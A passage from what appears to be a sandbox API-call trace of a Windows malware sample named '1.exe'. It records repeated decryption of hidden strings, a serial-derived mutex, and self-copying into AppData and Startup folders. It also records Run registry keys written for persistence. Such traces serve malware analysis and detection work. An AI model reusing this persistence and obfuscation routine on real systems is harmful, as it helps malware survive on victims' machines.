dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f850 | out: pbData=0x26a1240, pdwDataLen=0x98f850) returned 1 [0134.492] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1268 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1290 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a12b8 [0134.492] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f80c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f874 | out: phKey=0x98f874*=0xaa92d0) returned 1 [0134.492] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f85c, dwFlags=0x0) returned 1 [0134.492] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12b8, pdwDataLen=0x98f828 | out: pbData=0x26a12b8, pdwDataLen=0x98f828) returned 1 [0134.492] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12b8 | out: hHeap=0x26a0000) returned 1 [0134.492] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1290 | out: hHeap=0x26a0000) returned 1 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.492] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x98f8dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x98f8dc*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.493] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1268 | out: hHeap=0x26a0000) returned 1 [0134.493] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a1240 [0134.493] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f868, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8d0 | out: phKey=0x98f8d0*=0xaa91d0) returned 1 [0134.493] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f8b8, dwFlags=0x0) returned 1 [0134.493] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f884 | out: pbData=0x26a1240, pdwDataLen=0x98f884) returned 1 [0134.493] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.493] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a1288 [0134.493] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0134.493] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x1f0 [0134.493] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0134.493] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.493] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1288 | out: hHeap=0x26a0000) returned 1 [0134.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1152019, lpParameter=0x98f9a4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x60) returned 0x26a1240 [0134.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f878, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8e0 | out: phKey=0x98f8e0*=0xaa91d0) returned 1 [0134.494] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f8c8, dwFlags=0x0) returned 1 [0134.494] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f894 | out: pbData=0x26a1240, pdwDataLen=0x98f894) returned 1 [0134.494] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12a8 [0134.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f850, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8b8 | out: phKey=0x98f8b8*=0xaa9010) returned 1 [0134.494] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8a0, dwFlags=0x0) returned 1 [0134.494] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x98f86c | out: pbData=0x26a12a8, pdwDataLen=0x98f86c) returned 1 [0134.494] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a12d0 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a12f8 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1320 [0134.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f828, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f890 | out: phKey=0x98f890*=0xaa9450) returned 1 [0134.494] CryptSetKeyParam (hKey=0xaa9450, dwParam=0x1, pbData=0x98f878, dwFlags=0x0) returned 1 [0134.494] CryptDecrypt (in: hKey=0xaa9450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1320, pdwDataLen=0x98f844 | out: pbData=0x26a1320, pdwDataLen=0x98f844) returned 1 [0134.494] CryptDestroyKey (hKey=0xaa9450) returned 1 [0134.494] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1320 | out: hHeap=0x26a0000) returned 1 [0134.494] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x26a12d0, nSize=0xf | out: lpDst="") returned 0x1e [0134.494] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12f8 | out: hHeap=0x26a0000) returned 1 [0134.494] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x3a) returned 0x26a12d0 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x3a) returned 0x26a1318 [0134.494] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1360 [0134.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f88c | out: phKey=0x98f88c*=0xaa92d0) returned 1 [0134.494] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f874, dwFlags=0x0) returned 1 [0134.494] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1360, pdwDataLen=0x98f840 | out: pbData=0x26a1360, pdwDataLen=0x98f840) returned 1 [0134.495] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1360 | out: hHeap=0x26a0000) returned 1 [0134.495] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x26a12d0, nSize=0x1d | out: lpDst="") returned 0x1e [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1318 | out: hHeap=0x26a0000) returned 1 [0134.495] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x72) returned 0x26a12d0 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x72) returned 0x26a1350 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a13d0 [0134.495] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f88c | out: phKey=0x98f88c*=0xaa93d0) returned 1 [0134.495] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x98f874, dwFlags=0x0) returned 1 [0134.495] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a13d0, pdwDataLen=0x98f840 | out: pbData=0x26a13d0, pdwDataLen=0x98f840) returned 1 [0134.495] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a13d0 | out: hHeap=0x26a0000) returned 1 [0134.495] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x26a12d0, nSize=0x39 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x1e [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1350 | out: hHeap=0x26a0000) returned 1 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a1350 [0134.495] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f84c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8b4 | out: phKey=0x98f8b4*=0xaa91d0) returned 1 [0134.495] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f89c, dwFlags=0x0) returned 1 [0134.495] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1350, pdwDataLen=0x98f868 | out: pbData=0x26a1350, pdwDataLen=0x98f868) returned 1 [0134.495] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x3e) returned 0x26a1398 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x3e) returned 0x26a13e0 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1428 [0134.495] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f88c | out: phKey=0x98f88c*=0xaa93d0) returned 1 [0134.495] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x98f874, dwFlags=0x0) returned 1 [0134.495] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1428, pdwDataLen=0x98f840 | out: pbData=0x26a1428, pdwDataLen=0x98f840) returned 1 [0134.495] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x10) returned 0x26a12a8 [0134.495] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f808 | out: phkResult=0x98f808*=0x220) returned 0x0 [0134.495] RegQueryValueExW (in: hKey=0x220, lpValueName="Startup", lpReserved=0x0, lpType=0x98f804, lpData=0x26a13e0, lpcbData=0x98f80c*=0x3e | out: lpType=0x98f804*=0x2, lpData=0x26a13e0*=0xc8, lpcbData=0x98f80c*=0x98) returned 0xea [0134.495] RegCloseKey (hKey=0x220) returned 0x0 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1428 | out: hHeap=0x26a0000) returned 1 [0134.495] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a13e0 | out: hHeap=0x26a0000) returned 1 [0134.495] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a1398, Size=0x7a) returned 0x26a1398 [0134.495] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x7a) returned 0x26a1420 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a14a8 [0134.496] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f820, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f888 | out: phKey=0x98f888*=0xaa9010) returned 1 [0134.496] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f870, dwFlags=0x0) returned 1 [0134.496] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14a8, pdwDataLen=0x98f83c | out: pbData=0x26a14a8, pdwDataLen=0x98f83c) returned 1 [0134.496] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x10) returned 0x26a12a8 [0134.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f804 | out: phkResult=0x98f804*=0x220) returned 0x0 [0134.496] RegQueryValueExW (in: hKey=0x220, lpValueName="Startup", lpReserved=0x0, lpType=0x98f800, lpData=0x26a1420, lpcbData=0x98f808*=0x7a | out: lpType=0x98f800*=0x2, lpData=0x26a1420*=0xc8, lpcbData=0x98f808*=0x98) returned 0xea [0134.496] RegCloseKey (hKey=0x220) returned 0x0 [0134.496] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.496] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14a8 | out: hHeap=0x26a0000) returned 1 [0134.496] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1420 | out: hHeap=0x26a0000) returned 1 [0134.496] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a1398, Size=0xf2) returned 0x26a1398 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0xf2) returned 0x26a43c8 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1498 [0134.496] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f820, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f888 | out: phKey=0x98f888*=0xaa9610) returned 1 [0134.496] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x98f870, dwFlags=0x0) returned 1 [0134.496] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1498, pdwDataLen=0x98f83c | out: pbData=0x26a1498, pdwDataLen=0x98f83c) returned 1 [0134.496] CryptDestroyKey (hKey=0xaa9610) returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x10) returned 0x26a12a8 [0134.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f804 | out: phkResult=0x98f804*=0x220) returned 0x0 [0134.496] RegQueryValueExW (in: hKey=0x220, lpValueName="Startup", lpReserved=0x0, lpType=0x98f800, lpData=0x26a43c8, lpcbData=0x98f808*=0xf2 | out: lpType=0x98f800*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x98f808*=0x98) returned 0x0 [0134.496] RegCloseKey (hKey=0x220) returned 0x0 [0134.496] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a12a8 [0134.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f804 | out: phkResult=0x98f804*=0x220) returned 0x0 [0134.496] RegQueryValueExW (in: hKey=0x220, lpValueName="Common Startup", lpReserved=0x0, lpType=0x98f800, lpData=0x26a4460, lpcbData=0x98f808*=0x5a | out: lpType=0x98f800*=0x0, lpData=0x26a4460*=0x0, lpcbData=0x98f808*=0x5a) returned 0x2 [0134.496] RegCloseKey (hKey=0x220) returned 0x0 [0134.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f818 | out: phkResult=0x98f818*=0x220) returned 0x0 [0134.496] RegQueryValueExW (in: hKey=0x220, lpValueName="Common Startup", lpReserved=0x0, lpType=0x98f814, lpData=0x26a4460, lpcbData=0x98f81c*=0x5a | out: lpType=0x98f814*=0x2, lpData=0x26a4460*=0x0, lpcbData=0x98f81c*=0x78) returned 0xea [0134.497] RegCloseKey (hKey=0x220) returned 0x0 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1498 | out: hHeap=0x26a0000) returned 1 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.497] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a1398, Size=0x1e2) returned 0x26a43c8 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e2) returned 0x26a45b8 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1398 [0134.497] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f820, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f888 | out: phKey=0x98f888*=0xaa9010) returned 1 [0134.497] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f870, dwFlags=0x0) returned 1 [0134.497] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1398, pdwDataLen=0x98f83c | out: pbData=0x26a1398, pdwDataLen=0x98f83c) returned 1 [0134.497] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x10) returned 0x26a12a8 [0134.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f804 | out: phkResult=0x98f804*=0x220) returned 0x0 [0134.497] RegQueryValueExW (in: hKey=0x220, lpValueName="Startup", lpReserved=0x0, lpType=0x98f800, lpData=0x26a45b8, lpcbData=0x98f808*=0x1e2 | out: lpType=0x98f800*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x98f808*=0x98) returned 0x0 [0134.497] RegCloseKey (hKey=0x220) returned 0x0 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a12a8 [0134.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f804 | out: phkResult=0x98f804*=0x220) returned 0x0 [0134.497] RegQueryValueExW (in: hKey=0x220, lpValueName="Common Startup", lpReserved=0x0, lpType=0x98f800, lpData=0x26a4650, lpcbData=0x98f808*=0x14a | out: lpType=0x98f800*=0x0, lpData=0x26a4650*=0x0, lpcbData=0x98f808*=0x14a) returned 0x2 [0134.497] RegCloseKey (hKey=0x220) returned 0x0 [0134.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x98f818 | out: phkResult=0x98f818*=0x220) returned 0x0 [0134.497] RegQueryValueExW (in: hKey=0x220, lpValueName="Common Startup", lpReserved=0x0, lpType=0x98f814, lpData=0x26a4650, lpcbData=0x98f81c*=0x14a | out: lpType=0x98f814*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x98f81c*=0x78) returned 0x0 [0134.497] RegCloseKey (hKey=0x220) returned 0x0 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1398 | out: hHeap=0x26a0000) returned 1 [0134.497] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x26a43c8, nSize=0xf1 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x8b [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a45b8 | out: hHeap=0x26a0000) returned 1 [0134.497] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1350 | out: hHeap=0x26a0000) returned 1 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a45b8 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a47d0 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a49e8 [0134.497] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a4c00 [0134.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26a45b8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.498] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a4e18 [0134.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26a4e18, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.498] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4e18 | out: hHeap=0x26a0000) returned 1 [0134.498] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a4e18 [0134.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26a4e18, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.498] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4e18 | out: hHeap=0x26a0000) returned 1 [0134.498] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\1.exe"), bFailIfExists=0) returned 1 [0134.508] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x98f91c | out: phkResult=0x98f91c*=0x220) returned 0x0 [0134.508] RegSetValueExW (in: hKey=0x220, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0134.509] RegCloseKey (hKey=0x220) returned 0x0 [0134.509] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x98f908 | out: phkResult=0x98f908*=0x220) returned 0x0 [0134.509] RegSetValueExW (in: hKey=0x220, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0134.509] RegCloseKey (hKey=0x220) returned 0x0 [0134.509] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x118) returned 0x26a1350 [0134.509] GetLastError () returned 0x0 [0134.509] SetLastError (dwErrCode=0x0) [0134.509] GetLastError () returned 0x0 [0134.509] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0134.510] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1350 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a45b8 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a47d0 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a49e8 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4c00 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12d0 | out: hHeap=0x26a0000) returned 1 [0134.510] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0xc0) returned 0x26a1240 [0134.511] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f8ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f914 | out: phKey=0x98f914*=0xaa9050) returned 1 [0134.511] CryptSetKeyParam (hKey=0xaa9050, dwParam=0x1, pbData=0x98f8fc, dwFlags=0x0) returned 1 [0134.511] CryptDecrypt (in: hKey=0xaa9050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f8c8 | out: pbData=0x26a1240, pdwDataLen=0x98f8c8) returned 1 [0134.511] CryptDestroyKey (hKey=0xaa9050) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0xbd) returned 0x26a1308 [0134.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 